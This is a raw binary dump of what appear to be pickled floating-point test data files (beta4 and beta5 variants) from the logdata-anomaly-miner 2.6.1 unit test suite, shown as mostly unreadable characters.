vkG?}TG?'0PG?@G?t"G?}ǶmƝhG? sG?fG?˓ \ ;G?0"G?78jrG?Ąb"G?a _,WG?{rv}G?wy|pG?m,^G?_kG?߯(0!2G?IJG?\'G?W/G?VSLIG?iZĮ G?O+ùG?BG~G?J9aG??~G?򘦼G?B[fG?/k/G?["*G?4G?*rG?7識G?ž؅BG?ɎC9G?ӻG?:ӢdG?ΌG"HG?#׆9G?BjG?kG?ЯQ%G?-gD G?QpG?t ,+G?YQG?MjG?=MTG?F&Y G?˅sAG?VMG?ٓKWrG? ZG? 4G?ϋ8G?\~FMG?MQ G?҇]G?*]"G?Lߌ,G?d`L#G?ڔ(G? G?[׀G? yLG?HE{G?L6CG?^><_G?]p.G?ѯkG?u]ЮіG?رG?%G?5G?k"G?c*G? %G?*qyBG?NG?tvV G?.G?hG?+!uG?׺IJG? G?6bG?qFG?k5nXVcG?ɍcRG?(ZG?{ұ$G?Gp&xEG?ZzG?zqG?>zoG?WtG?mȽWG?\G?ɢ }'G? ǮG??CʂG?VG??ӖAG?ƌ:VG?5G?`ƴG?ٌPƴG?'\itG?P'3G? `߫G?˜HJG?o[G?.'G?ݗ }G?ѨG?qG}G?BG?)RG?dG?9B^G? GG?Լ-K.G?:l)YG?'``G?ZQG?{-G?ӛJMLG?k::_YG?{G?*ugEG?c_rG?[-MG?x¸G?jG?IoVDoG?Ӯ)bG?ļwyQG?xX-G?1n:G?-G?UG?h^VG?xצG?BJG?Ɛa{G?g*G?PG?TM-G?b G?#DG?QKpG?ƎxGmG?3yOzG?G?kXG?귊rG? }iG?KG?5=6/G??G?HMAG?X`KtG?ÚnrG?\G?t ӘG?±`HG?" 0p*G?5j|ahG?ζVJG?}G?L ,G?G?-ۺyG?Im:' G?ЀGdG?68(8G?p^G?ߜG?sG?*{;0G?EʔG?W$G?-QaBG?ѽxG?MMrG?* +G?wG˺AG?W-mG?m@zG?|iG?r/)yG?/ZjG? ՎG?R+~G?`>G?pӣG?n'G?UqG?єVFG?cs?陰G?1VcfG?/TG?J,IG?6G?̕DFG?RHśG?ZVG?nfC.G?`\G?gG?ƂG?R:G?Фs)G?&G?_XHhG?%W G?) oG?RG?͒MB4G? ZG?U4/G?̮=G?NM*G?,SG?VS۱G?."*҂yG?!σG?͢tG?C̊8G?G?ZG?W@-G?ɰBG?ۀV,G?5_ 2G?ϟ ?[G?YjXG?[G?$ujG?(Y0"G?Tue](KKKKKKKKKKKKKKKKKKKKe](KKKKKKKKKKKKKKKKKKKKee.logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/data/vtd_data/beta4_data_test7000066400000000000000000000647021437606560100275350ustar00rootroot00000000000000i](](G?Xl|G?n{G?[nRG?LG?Duo::G?yG? G? ǰgG?d jpG?ӉCOG?F*춉G?p0G?0@G?=WG? tG?0ƪG? gG?; G?ەVvG?]>G?GۅG?@V+ӍG?vIG?ƨG?41 G?8G?g1!G?ɟxG?!1rG?f'yG?unG?ZnG?V^G? MG?"~G??fG?MdKG?˷: G?m_4G?2G?gG?GB@vG?΂:A}G?3dq_G?|؊G?Q\G?0zG?ɰ}G?ɞ4G?Åf)7G?MGG?K4G?;bG?B3G?)øSG?LG? ˜G?sG?9G?ݒC$MG?R SUG?Ď G?'ҿC\MG?boG?k;G?XToG?[G?XNG?ў$=WG?BG? G?2M|iG?Gr"G?:q~G?%~G?)^hG?ʒaxG?ğtHCG?͢#~G?oKLG?|μlG?v?*G?kQ'G?G?"]GG?+8G? G?wDGG?OvG?"-G?&Nx G?aG?V٭ G?vG?rbG?=G? SG?r%G?SŠG?^G?G9G?w:4[G? [+WeG?ܺ[G?z;b}G?йG?p"efOG?ޚ0G?{iOG?~G?ڎG?ZMG?ݢ56.G?t{G?\xG?:0G?jt8G?ΓY`G?G:UG?EG?@|@G?'H,G?SRtG?z_oG?hpG?cs[:CG?2PG?L"G?<놟G?ǵG?hvG?qH5G??֠G?ƒ܎AG?y@JG?LH@G?#xbG?\G?5bqG?w;OG?[h!G?G?~3G?S,&G?Քr1TG?*cG?G?QUVG?j4G?)"5&G?pUbG?iK,|G?G?YzG?&'=fG?bIG?geG?־ɦ"G?¦Y7G?ΏG?+kG?G?11G?HG?ќLOG?*G?ǥ$G?Q+xG?P^9G?o{G?FN0G?v7G?<?G?؍wBsG?RƳ5G?Q sG?vGG? M^"@G?m>CG?Ƚm}G?>zGWG?dG?*?zG?]'G?tHG?G?ɣ vG?̯q,WaG?G?l>rG?|v]4G?IfG?]վG?\럲 G?D_d-dG?iRG?G?Ā]G?$2G?(>G?l1zG?U/G?Y%G?-G?]G?#V{YsG?¹`JG?Z/G?{>G? nG?ZG?G?w #G?-hjs[G?4G?˫|G?HG?ˍ<G?=GG?9ۤG?&q<#GG?w-Q+G?0>\wsG?QG?'G+G?JTaG?GNG?`ęG?_G?͏8vpG?) G?ؾR |G?ì eG?*=,@G?,G?Z_1bG?-cG?ŻsG?{IϟG?ʉgvwG?_ *NG?ܖjCGG?pnJpG? (1G?KH%G?!uT G?|! G? ߇FG?|SG?%tG?nPG?lܞVG?G?`'ϷG?˃(2{G?k~ÐG?폞^G?vp G?J8/سG?dL 퇂G?0WG?IKzn#kG?aer(pG?(KY"'G?=FG?)/G?]G?0?[G?, ضIG? G?^[KG?FG?zRcG?߽[&G?Q|Fj'G?lxG?>gqG?,Sb_G?ǜ2 ^G?ՙVG?wS^G?1wQG?| YG?ՏtG?|G?Tf'wG?ѱNCG?cT ]wG?IEG?92G??+_G?&IlG?k>䩿G?_LmG?Ԋ07G?o,G?> XG?UMe /G?vRG?RCG?wmozG?GrG?E]G?ׄFQQG?G?AG?3"G?3| G?zPqG?`xG?1#[G?]r@G?҄G?Ӕ6G?eTG?˲|G?R@2G?+Z> G?ReG?KG? (G?m jG?p,ɽG?—tNG?ō!G?6UZIG?HVG?2G?G?2'*G?gigG?2Z-G?`G?SEG?G?^HOJG?%G?w G?:FjG?DK@6G?uSG?Q8TG?Y#i4NR]G?(AuG?Ń+_G?gLg;ZG?G?+czG? ~7G?dG?hWnPG?݆Fe;G?)>G?'-G?˹)G?Wñ_PG?G?:xҴG?|SoHG?԰>QG?lrG?ʏG?220G?ʷVG?,G?G?hG?[ Kk*G?)G?oG?KGG?۸ !G?E߽q~G?lK,p\G?U 'G?ٚ)"G?ŏHiG?C~ G?@FG?k}G?!ƅzG?!G?C>?LG?TG?K)#G?ЛG?U)G?ȼG?pJޣG?=`G?AuG?$hHiuG?b))vG?bQG?~= G?ɑZG?x .hG?rG?bhG?2G?ibG?,`h@G?@t oG?p}G?yQG?yG?3`G?l\jG?g e>G?_41kG?4ȴQG?A}G?τeGG? [G?VqG?aִG?ɞ-XG?+'G?RqP 8G?SI5G?q ІG?c0G?7G?lRG?dusG?҄spG?DҠG?V UG?MG?RJG?wSrG?}K%G??֚(G?tϽAG?¥7B'G?Ż*G?_n|i,G?ޓG?46G?yk*7G?5G?G9kG? G?:WHYG?򥭲iG?.G?h2UǞG?Ɵq5ԟG?qDG?B%G?dG?a4*G?XuDG?5G?慩G?6:G?\cUG?u8zG?VΣG?1G?ߨQ6G?$rrG?䄂~G?YcG?UutZG? G?aCG?1uG?2xG?e ]G?FmcG?{G?HbG?i,G?-G?2ZG?6 G?TG?p~AiG?KG?uqb6G?̊)G?}6G?{VD3G?QvG?[./gG?k MG?̜)ʱG?e_沨G?˄=qG?@C?G?XG?L'iG?s:]G?X !_G?NG?تOG?ɜ.G?k4G?v%JI/G?gOG?^݌G?.)G?hG?ٽ G?>G?/w+mG?S'sCG?,kG?G#CG?İ XG?vIZCG?¦9nG?;G?Ã4$ G?ApMG?;BG?m.b%G?KjUzNG? SG?!u\xG?s)d6G? %:)G?FAyG?ܜ? G?EQgG?9QIyG?y'1!G?NɎ%+G?{DAH$G?1MwG?:Aʻ.G?tсG?t!mG?xG?xz3jG?mtGG?M efG?i!FG?vipYHG?!G?3S&OG?m٫xG?}y#G?6ʚG? G?|wG?{Z:)G?GG?˱O#F3G?F?R G?n9G?lrG?kG?CHG?1 G?fnx3G?P+Q7G?AעG? 0)G?VG?=q(nG?_3G?HodmG?5h-GG?iUG?]G?EGjG?YkgG?G?YG?:G? q79G?*kLG?' G?7qtG?OO W͸G?{LG?^H oG?9 ~G?z#qlG?ÜKRG?{[lAG?"kG?kG?#9гG?\r0G?Hf]/G?+cuQG?ˬ1 GG?B+G?0*)G?a0`G?LG6G?pL-?G?MG?a aHG?hҕ}G?ӂP@G?4]3G?ÐGG?Ң)G?Ӷ&G?) ΰG?܄?ХgG?5⪌G?}G?ddEG?p˃G?r3G,G?zG?ׯ\AG?LF@G?mfBG?@BVG?ٯ*eG?SG?ijLG?}H6rG?4P@~G?nBfG?)$G?P`mG?\ҰG?:.^G?IP0YG?¢v4uG?SFىxG?侓P8G?!(G?TG?@oJG?8K\c G?G?RTG?WG?hTtI+G?-$G?,UGfG?ZǾG?g?TG?ԠG?րCxG?'ƛ 0G?_V.G?47G?IIcJG?G?$\G?SG?NeG?r%M{G?4G?sVG?}cyG? V`2G?nG?s FG?(G?3i_:G?HZG??ԦG?[P<G?\NG?xG?NWTG?{WQ/G?x,^{ G?cEG?^XBqG?r>ߘG?@UfG?V&G?r 8G?0_G?2#5G?D۳1G?g ja?G?qkG?)G?0G?^ᑔ)G?~\G? &;WG?6VR1G?<0LxG?x'(oG?ځGG?;U\G?(y/G?ZUG?OeiG?pG?qB̈G?RG?к;G?d|G?ɖkwISG?TG?ƍ+G?=~G?(+jhG?h aqޑG?8G?/.G?ǁ zG?4$SG?StgƃeG?tŒ-G?{G?qIwXG?/UD/G?Mӗ7V7G?\I3FG?2G?pV8G?qn{G?*Bì_G?`"G?mt"G?%d[PG?ѷ$G?ܛ^m3G?$ G?X`薕G?(|@G?B&G?ZG?uE0\G?}2G?G?FޗG?dG?yןG?Z?G?vPG?jq_G?kNxG?n\PG? ٻ G?SdG?߀Q 7BG?ľa]XG?SOG?`OG?'sIuG?erG?؃G?Y_G?٥G?t1G?%IG?E鹸0G?z!hG?ↀ3fG?qMG? T'ΚG?eޛ}G?z5SG?&I(YG?ɼBS2G?P=uzG?YXGDG?E&G?Ŝ*G?+XlG?|lώG?Ϝ9;WG?E8!VG?kG?DG?ZNG?)]7G?yh.XG?qԂG?i;$G?SGWe(G?!0DMfG?spG? JG? ivG?꠳:G?N G?8q\%G?/G?<\G? $OG?x42>hG?VgG?N#G?ƂtG?Vt?G?#僎G?RVG?n۠G?OG?'G?8?G?l}G?VPG? G?幅G?Ū*cM9G?.xnG? 6}@G?8h`ײG?G?@G?4WG?1cG? [(G?ԨXhkG?^cG?$G?k~G?ѷhPG?S ȺxG?FG?y:G?Λ: G?>G?uׇQJG?iiG?ŨľG?|p6G?%WG?S>#2G?AsG?e1G?$9G?wكG?`jiG?˻QVG? G?J藓G?NsG?CJWs,G?i e$gG?'qܭZG?G}oG?7^G?}HKQ G?l8G?G?ݞ}G?~#G?^6G?JPrKG?3.bG?øXG?ܣܶG?!G?."G?^?G?ُ)ċG?]&T G?А+DVG?ĺG?Y%`G?gHG? ~ 9G?l'kG?ӣ*G?r?3G?K&G?[G?E~(G?Q@G?H%G? wG?3ic'G?fCG?v$7%G?*(, G?BĸQ*G?*G?f'G?MN[G? [SG?! $RG? ~iG?B${/G?(=fG?fWG?á|G?R\xG?i^bG?m.ۦG?ѕ83G?%#ȰG?Ւ{G?0\G?PPG?ܾG?VIZG?TPG?™(JG?'lܺG?vgeG?@6HG?Gr2 G?e#%EG?bZ!xG?qWoG?wMfG?'R޻gG?Rj(G?d;OG?ظȈrG?O G?[z~G?|KZG?D!-vnG?i{G??1cG?i*G?ԝ lG?{wG?~'ƼG?Ѿ (G?ʧzG?tnwG?I6G? G?ђg8G?ázL G?]y zG?)V;G?bS@~G?ͱ[G?fEG?x4cG?PŨKG?ځG?MQRG?d(G?ȶ2oG?cr/vG?X[?&G?E9G?:hIG?GG?`- ?G?swG?(R G?2tfMIG?,tG?X\G?0G?X`ҟ*G?Q0s_G?0䊖2G?HgeG?܅G?y})G?Úʎ >G?ժG?ҳ\dG? F#lG?˔G?8r3G?֖>QG?A(G?wHmG?G?0$ӥG?٣fG?3% @G?TwG?=WG?G?ںɪ,G?(܏G?CJ }G?`c;ʟG?UG?Ԧ,G?i&G? G?#v]xG?}&\G?i T3 G?y7G?ξimG?ŢhrgG?+psG?QxqyZG?p\G?1܋CG?'+r=G?G?a2(6G?#×G?˯ExG?>3fG?|lSG?`&ZXG?V0`[G?rNG?JP''G?DxUG?+e sG?CyKG?`ZdMG?r$G?淺(JG?vːG?,nMG?pTG?eja $G?ˋ]YG?>J9G?sG?lgG?VIG?hvG?ݗWiG?"1 G?ZXӌG? JG?܎juG?G|@G?ޭG?z%G? 0K!G?˛RG?~`}G?ӀEAG?M{l,G?NG?'!G?/TmIG?>BcdG?G?ɚH(H?G?qy#c-G?, G?{=G?")iG?PG?G?/ODG?y9LG?`!ޑG?iG?K7 G?ޝu|G?կ`XwG?;= G?G?E}QG?-ã?G?oGG?CIG?iiHG? 'G?wAj֩G?؎v[G?yv G?ʀG?G?єYG?%Ÿ\'G?j酺G?ݾoG?8#JG?G?c +;G?>czG?cu,G?nxkG?u]%G?3G?LG?ڲk9¢G? sMG?ILCVUG?G?cSK! iG?`k SG?G-G?_G?[?h= G?vBݴ%G?G?}n)G?[G?XgXG?!VX2G?Z, G?D<@G?9G?op?*G?I IG? .`G?/UG?X[G?0 G?WG?XJG?n?WG?۾bhWG?w G?9bn.G?EʧG?̿3G? {VG?ǎ;dG?ީ#DiG?uG?αI-G?ȟ=G?iMG?ȗ 쪽G?",G?Z>,G?T]r'G? $&(IG?'$NG? G?RFG?АG?uƚG?טTY\G?LG?fW LG?W}_G?ĥl"|G?]ONG?߁ 5G?,{$=G?^AG?V,G?۷G?=<,bG?uitG?RĊG?j!iG?#g(G?k2G?mP|]G?nϢG?p[&G?sɴ(G?ʏ3G?G?YtUF:G?aG?˚;Β~G?q[PG?۪"G?nUG?=srYG?y!.G?|TG?`̴MjG?ofG?)wJG?lG?:G?C56 G?~ƈG?$AG?6BG?RVJG?ݧB}G?{iG?tvG?uYJMG?։ƒ|G?_0bG?3_) G?lw2G?rdG?&DG?RZJ6G?v@oG?o|mG?OC`G?]-G?+G?"NsyG?ed,G?Z(+G?էKYG?¯6G?ZP˜G?0G?""0G?˱sFddG?NBDuG?eRq=NG?-&b?G?RMlG?4RG?증 G?=G?]MM?aG?G?"aG?c< ,G? Q%G?į5{nG?G?'K/OG?ruG?_G?ӐG?UZ6*G? 1G?! 6G?CVG?DG?'G?]q FwG?ͱpG? . G?ЙgvN~G?tFG?'>-G?UaG?LxG?;G?iyG?#3 G?#dG?sRAUG?̸ֳiG?D$qaG?>(G?r?GG?)`/G? 3G?Ưi]ԽG?ЂG?ȱG?w*G?ml8G?ا-ӰG?u"BG? rLG?9X>G?asG?&!G?g\ G? TG?ٳrG?cҊsG?ZP PG?r~zRG?UeG?ΪG?PJ6G?vG?G?p㛒G?h3SR}G?ϞvnoG?G?ye1}3G?^EG?c:a@G?'o|LG?F(,G?l+օG?؍G&G?K8G?W7<4G?u^m G?{[+@G?=$G? ZG?ΡעG?kH1G?oFCG?;T jG?wDeG?$mMG?Nf8BG?rG? !>G?R(aG?u}fG?fG?oQo +G?eG?εۻG?_tSG?9BqG?*m{G?5HG?,klG?χMfG?r,TIG?&w|G?t7?oG?o[G?GLUG?ҡ 6G?\`G?̜!]G?ط<G?+MG?fPG?eG?t_QG?N(rG?D.G?#[BG?pqG?glG?9uEG?qYyG?B0wG?2G?ЁZXOWG?hUPcG?qxZG?y-G?7^,G?ʵtG?ƌPBG?pG?ү\uG?IӯG?ˎpG?h`WG?q1G?R!qG?Ȓ}InG?K6 \G?%lFG?<ܿG?]jG?D*G?4G?]1iG?g`G?ƑelG?gf@zG?(XyG?dG?ŵי9G?tfG?ҁ܁G?۳E(G?K4G?ÈG? &+ѻG? ?8Q_G?vG?{ꂐ!G?W xG?b!KG?e{oG?*ڟmG?Iv_ G?qOHG?)Θ޴G?@G?mxG?Ԗ$U\G?5G?oI G?<G?DʽG?{ G?ʂy G?TTMG?UG?{[VݰBG?є2E^G?pa1G?BZ~IeG?5 G?h_ZG?ƷgG?>a_G?~LLcz9G?{G?epG? .GG?XlG?z-KG?hTG?h?G?aڅG?VyUG?Ys0G?v,G? &7G?ɃG?UmVyG?hB G?CMG?;rG?W"36SG?!]+,fG?e"MbG?3TaG?$e](G?Na#G?&G?y'l#G?#=xG?ǩ G?EG?+G?"}s~G? ScG?xG?͂FEG?O&G?lmc!G?HG?j̯G?=!N0G?L&cG?\ͧrG?ѶG?y$hG?Ș)G?P$G?,HB'G?7HG?ưj5G?hG?}cG?KcrG?ҖnG?G=G? 87bUG?&2.9G?yEG?cG?|G?+\T[ G?lG>TG?MG?۪\1G?i-G?G?恿<G?yG?0*G?ϊG?sG?h_HT,~G?gȯAHG?߰GG?s3G?G?!&G?Ƹ4G?7SG?`I7G? "LyG?~{fRG?àtEG?j_5G?i_gZG?I:ox/G?^G?|؆G? XG?ֺStqG?)Wt G?gp6MG?we#G?GtJG?[CSxG?yjG?=ַ}G?yO$G?tG?D0LG?М#G0G?C|G?ߛ-yG?߷kG?\*AG?$КG?gyeUG?G?k5G?KbG?ءKLG? 1G?[ZG?B$G?ؼ" G?ܣz]G?2 G?͊a1G?fgG?:^ĊG? NG?Ɏ静#G?$G?}TPG?E.G?pN#G?,JwG?SڕG?A&:?G?\bG?v@90G?ȗG?z/G?vGrG?:QG?AG?:U`G?Ǥ> *G?֘tp2G?G?ѮxJG?7a3 (G?uEG?A G?àG?V7G?x$.G?/7 G?*kRG?,SMG?"lG?l?FG?|Z%G?ԥ7G?ä)G?wjZG?,*G?/<+ G?t{hG?Y8~G?ưΪgPG?=|gٕG?cqG?Mt G?u"G?L$G?=g7G?&_ G?әy6=G?ƃ^ɨKG?ehrhG?FL5G?WG?DbyG?1=G?8P<3G?X;Q3G?p7G?:(G?؞^G?[qG?[ltG?"0sG?78G?RG?G?/G?(1G?.=aG?"'G?z}^G?WEG?lJOG?Ѷ+NG?K dG?wTNG?L$G?ItBG?]mB7]G? kG?pR]G?qkbG?q\G?bkG?lj#G?bŭjG?wG?G?Ѥ=.G?{[G?qG?J]nG?uS[G?{:G?*G?E4s5G?A 7G?D|G?Ȱ2L1G?WzFG?¡ G?wG?걕TG?ÔK+ZG?=|4G?ڢ:bpG?~(G?g}G?ӣG?|4G?ٗhG?;"G?ܭÍG?ʔV8 G?5I1G?&35G?)G?U*7G?SPG?E>G?ɸ)qG?rU{G?}'G?AwG?^`UAG?ꖈPG?%[G?ͬG?"G?ク0G?bEG?N9G?{ Ђ(G?#%aG?xF̮G?ܸYvT #G?l G?O#>{G?RFXG?ۻ.G?$MG?݃Y?!G?؟nƼG?LvG?v/eG?Hx\XG? [W]G?ؖ FG?ʌveG?Y+G?y:\3LG?+ʤ.G?G?.I׼"G?ظFG?T,/G?#;G?Y(G?ҖiC# G?e,DG?SG?ᬳuG?E<[G?>P G?ǿ !RG?v3G?}fG?NA?FG?4jG?AG?ܣ^67eGG?;IG?}y|G?iO&G?7PG?G?ņ$cRG?ՁpG?N1É4G?Ýٔ~G?oERG?vnG? NlJG?§GG?"I 0G?8G?B+G?Lʇ[G?@4G?JiG?iBG?@l-G?ZqG? /(G?pPjG?.*˽G?ȎKG?xb!8G?n+G?߻5G?Λ G?=}G?8_VG?5VhhG?ou G?,)G?r, )G?WUG?e1Q5G?ѴOoFPG?{jܪG?mH jG?ו5G?ҿHKcG?21aG?e@G?H*G?*G?LGG?Jq(0G?#ڹ G?ߗG?lj.G?6!G?ҘD2QG?`xG?QVVG?f9pG?v9l_FG?*G?M] YG?٭/ G?(:)G?ЭG?G9ǍG?Akm7G?i\ G?36@G?%wMG?DZG?ЛhG?QMv[9G?D1͖CG?R"G?^Wv!iG?効jG?sE(G?hFWG?"J)^G?d?G?)g)G?I-G?cYG?+WG?ș*HG?|G?-n4G?ODG?uw_G?y^pG?Ici&G?-ǔG? CSCG?n?i]G? BxG?;'7kUG?6QG?bG?YdiG?SJ;G?c7sG?>,,G?1Sй)G?v kRG?ϖ4>G?K[G?!`޲G?lG?0RG?qIG?6G?)9NG?1}4lG?!^IG?2އyG?)rG?G?/G?%ФG?y=VG?RvcG?!WVzG??G?ǜCG?N[`G?{G?G??ٸ|G?F)OG?Nk G?QG?LT.HG? j G?nT2G?,߽G?KCG?ѽ2{G?  G?L|pG?|կG?ȞfG?\2"G?G?~G?6JZ{G?$G?V8FG?$G?E@]G?G?kRi"G?Pc(G?kG?n%- G?El6-G?ٙ}4G?Ȳ7GoG?˄:|]G?n5SG?8.G?F`ӊ?FG?7G?}J2HaG?XIG?J QPG?xCG?V(‘G?I.G?ĵ1_[G?|G?Ĕ>G?*XJIG?G?,%]7G? ~KG?bYBYBG?,^DJG?rYG?'^EG? X+"G?# G?zusG?^nG?z /#G?ٔ3lJG?cQYTG?RW~AG?]GG?-G?c}G?1!$G? ( FG?G֣G?2VG?CW}G?CG?Y:,G?C,JG?RK G?1jG?8/=G?u\gG?hPXG?*naG?RG?o%s"G?"*G?WM[QG?\߬G?ߠ;G?̍PG? IG?w0G?,iI%G?lp FG?ЋG?Ǿ7G?kG?PG?""kG?ᆓ*&$G?Є;G?dA)G?' +?G?|G?[SҶG?]-pG?϶djG?riYG?^G?bO;O[G?m1@G?Z8ԯnrG?2}P.G?쓅G?+ G?7 FG?-!G?2[G?.a(G?ǖ8TmG?^JG?Mx'G?AȀG?%fG?Oc+G?ʊ|$G? 8?!G?ع}G?5o=G?npQG? m G?kSG?i4G?5@lG?į(G?6,~G?fSG?oyxG?}|]G?zdiG?X%cBG?R;G?8QG?^PG?yл G? U*G?}v&G?$G?CusG?X5G?I%8G?EYG?̳#6G?rG{IG? iG?kPN_:G?ҡ;e](e](ee.logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/data/vtd_data/beta5_data_test3000066400000000000000000000432761437606560100275350ustar00rootroot00000000000000F](](G?mP6LTG?pG?)72M]G?@9G?똉|݂G?Y G?歾G? $e|G?\EjG?܌-G?,W@RG?yBAG?_( D8G?W/vG?>PG?($G? Ta_G?#F"G?1gG?D!G?a}-G?̤G?אgG?M\G?>G? :EG?G?HXMG?B(tG?\" G?M׏G?wG?4G?rJG?HlG?yٚG?癀}h G?/9tG?ZzG?郮9;G? 9G?Elj?G?T|B;G?) jG?4<ǠG?ba1G?̒G?\֋$kG?`7AG?#g݈G?̺O G? 2G?^moMG?زM/;G?FEvG?"E G?G^.G?AG?Ԛd9G?G?]ޑ\:G?+%53G? G?@x3G?߶G?쫢mG? G?pwlG?Y˕G?E&+G?-`2G?T:4/G?IXG?Q9>G?6G?¨̉G? 4wG?DqEG?_G?xLG?v0G?G? *XG?P7~G?*AG?&ϙbG?뺺&-s5G?~9G?iaG? G?pRG?OSa~G?2JG?:/-G?~[G?AfG?d#G?k'G?]ڄrG?曐G?_G?nL5 G?MW$G?A ܆,G?MDOG? mG?r} G?ao"G?#/G?݇[ӥ\G?G?񅯘G?4G?8G?#X}G?JTsG?CFJG8G?2 ,CG?jfȜG?NG?F hG?l.G? KrG?)$G?ΰh G?2W[YG? } }G?{라G?PqYG?BSG?@JWG?TTG?ۡ4vG?ؔLmG?吒WG?hRiMG?EVNG?j)EG?DVsjDG?[SdqG? G?[G?'G?9KG?ʲ]!G?4B)G?Qc +G?wq(G?멱wTG?AG7G?7eG?o sG?G?'G?-PAG?,}U3G?إm(aG?KG?B%(G?èDG?T:G?s1;G?\%-UG?#% G?`G?(aVwG?8Y?G?e.G?NG?, G?JkG?(cyG?n$G?$s]G?춉ķqG? OG?f+>,G?&AEG? Hj-G?>嗤UG?+,G?!KG?,cA"G?[PG?^2'G?*G?3WG?2 eG?%G?sTG?}GVTG?~EG?[q4G?/LG?ǩ@/G?pG?3G? =G?~@G?KG?HtG?W@-fG?lӿG?5YD+G?7G?+OG?jR'G?!>G?=qEG?盜 яG?xiG?|xtG?qdG?{ۙ3G?1quG?12`G?iG?+!"ߢG?|G?!1G?kG?˩G?BG?)UG?4WG??G?wn"G? AaqG??)G?YLnG?p?G?uSG?M'< G?צ$#G? NG?߇GG?G?~hsG?h;4JG?đ;hG? m>G?MgLG?3ӤG?CG?#TG? "]G?rMG?~U G?]G?۟=*G?JNJmG?\3G?(7FG?/do"G?thdG?+ {G?~G?e.sG?7C"%G?tG?u:;G?y͑BG?@;eG? D`G?}pG?/vG?䊾 G?ѥG?ՍiZ@G?AߤG?;3(MzG?%G?߈x {LG?v&^G?j G?]&G?й&0G?ֲyG?nvG? `G?iV}G?+Ѷ?G?V1G?2G?6첹O3G?aHSG?B%G?~tHBG?\QrG?vTG? 0G^G?久 -a%G?亖 ?G?͢; iG? Q?G?y(/vG?eIaG?0wG?0G?/4HG?^GG?I G? AˌG?tޮG?"OG?Z^G?넳kG?KwG?గb%G?%EMG?F_G?ed!rG? G?Z[G?.Y؍ G?XOG?写fp G?뒀@W/G?X1G?]~G?W]NKG? G?A.ݺl#G?G?G?$1n(/G?2G8UG?* 8G?by+G?8#R8G?{N^G?ѣ\̢:G?5B|~G?v[iG?ZUG?aRG?٤gG?#_G?ﰘدG? PҵG?u.3G?]# 6G?VRG?EiPG?E"G?OcM_G?ߑǢG?: ]G?hG?qq;;G?|ӚG? vG?n FG?{zG?\G?h{G?G?P\:G?>G?첻G?1G?)!:G?j,f_(G?pG?ѵG?~ŷG? G?WG?IG?! :G?#5G?+u8G?bG?Gi&G?~HHG?4ހG?冭'jG?:G?,r-ԀG?BFlpG?.̯?G?jG?챋4'G?ꄲQG? 1G?xƪ;G? w0NG? Bc~=G?rLG?*N%G? g|G?hLbG?&)G?vWݯG?_vQG?>̥G?P=G? *G?Jt34G?0qG?eyG?RVG?uhxG?oG?jV3G? ݊NlG?lG?Z.ZG?0ϥ'G?c=JG?+&G?jRG?侰Q_G?$bkG?.b}j%G?sQՖ/G? I@G?@G?ZWG?Px.qG?썿>ߡ5G?4Ne(G?8$G?uDF,G?mOM|G?L G?kFG?U3G?ndG?곓G?/'UWG?噴?aG?뒃ȫ]G?VG?%蜭G?zNf$G?Q#aG?*G?LžG?PG?БG?qtG?3"޸ G?ۈ]G?>V"mG?UG[G?=s-G?^^%G? ;&G?셿,G?)se8G?H_G? ,CG?.cG?)G?ٙ@G?ѣ^G?GjG?@$ЖG?PG?IG?HZ?G?4G?V3#G?]G?`VG?dB5G?˅ G?wټ[G?v$G?@9G?^\G?)S>G?y*G?X&G?7IG?T~ȄG?! /G?$G?SlG?,D7m兖G?YvG?4G?頇!APG?~G?/G?~ |}G?dzdsG?CG?M"גeG?G?ө ]!G?jIǦG?G?0uG?ml G?I)G?7n*G?pWmG?2IG?`HD-G?D7~G?YM+CG?|Й G?DRG?9 PG?\}$G?TG?"/'ύ`G?N攻G?Dw:2G?/iG?HWG?LC<+G?caG?J7$G?2dYG?!G?.R|աG?ň1LG? ba/G?:G?l"JPG?馱\G?g0ezG?qTG?'r1G?KűZyG?t|;G?:@G? %j2G?L$G?̠TG?K\P]G?\.tG?>ߨOG?G?^>XG?CuG?QS{~G?1%OiG?5G?g9G?_zzG?P_G?ɚG?tG?ac@G?|ꞙG?8mG?pLG?jG?na{MG?a@1G?EG?cAG?8!G?(G?xG??G?9TpG?UmiG?pSG?/;G?TrG?+hG?9BёG?a4G?eG?k嘖G?sG? x$iG?vG?$P8,G? CG?mG3G?}[G?s~G?6G?uyG?שSG?I iSG?A>$G?rMo3G?.G?; =zG?{!G?i15G?XI%G?J<$G?X1tdG?뾡IG?ycUG?tNG?LUG?~7SLG?JyqG?G?SG?~|G?A2b1G?)\ G?R5QG?3-"G?;Yގ,G?%OvuG?}vŧG?"OuG?]߁G?ҪG?{G?P_G?4nKG?< G?NdVG?xhe"G?0cG?布ŠMG?zVRG?biHG? F9LG?˶RG?aYG? \G?kG?^+*G?주ZtG?}zG?ܱG?<爉G?&G?0QLՖG?ïyG?[dG?s ZEG?G: G?n,gG? wKjG?%"G?:G?n:cG?[ G?BG?*GcRG?a +EG?R/TQG?;WG?UvMO#G?!: G?#fG?oG?!*G?yjG?BӫG?4ZG?nWLG?lR}uG?TnG?eKG?m3G?麶G?Nl3G?b4G?正h1G?BvDFG?ܫ SHG?h1,G?[@G?13G?VxA/G? 8G?įy6G?"곑uUG?G?.G?=qG?8G?T:G?̎(FG?}HG?n|pG?;lRxRG?|%G?Α@G?zwvG?EaG? IG?;`iG? Cg%G?JPG?$0O/G?r3jG?cgG?U|?G?ʒG?ōeG?/ȉsۊG?8CG?o3OvG?ʍ@ǛG?"5G?RD%G?}G?ûJr7/G?R{覗G?ﻄݧG?uXG?sg(G?g[\G?6G?iDG?aGpG?y%hG?F]G?i*G?~ѼDG?璒cG?몌 G?>$k-G?yHFG?~uG? G?޻6G?QNG?Tc{G?91G?1|MG?-gG?f/G?p F%G?@uG?EOVG?*o1G?碍B G?CG?G?큣G?*onG?%G?ȻdxGG?Pv-G?=G?gؓ0cG?fvgG?φG?fAPJG? G? z G?(jG?ieXG?rv-G?QKG? G?? G?Ư|LG?﴿G?@d1G?=^4zG?$a G?n`G?2J٠rG?ۏG?ѼeG?uG?-G?G?/#G?(żZG?+68G?ӥG?͞*G?^G? mGPbG?N3'G?y(\0G?<>cG?À@G?qkG?h]G?夂#,G?\]=yG?t/2G?EzG?.0FG?ȴG?3}2)G?X7) G?S)G?G?osiG?^G?K-͓G?W"G?嶭Q&G?=ԋG?D?7:G?)ݗG?s)&G?jyG?6NG?-cG?!Sg]0G?MXG?ztG?Y)G?}G?؃ G?g1b=;G?sZaG?"RG?٣1G?G?U(G?, 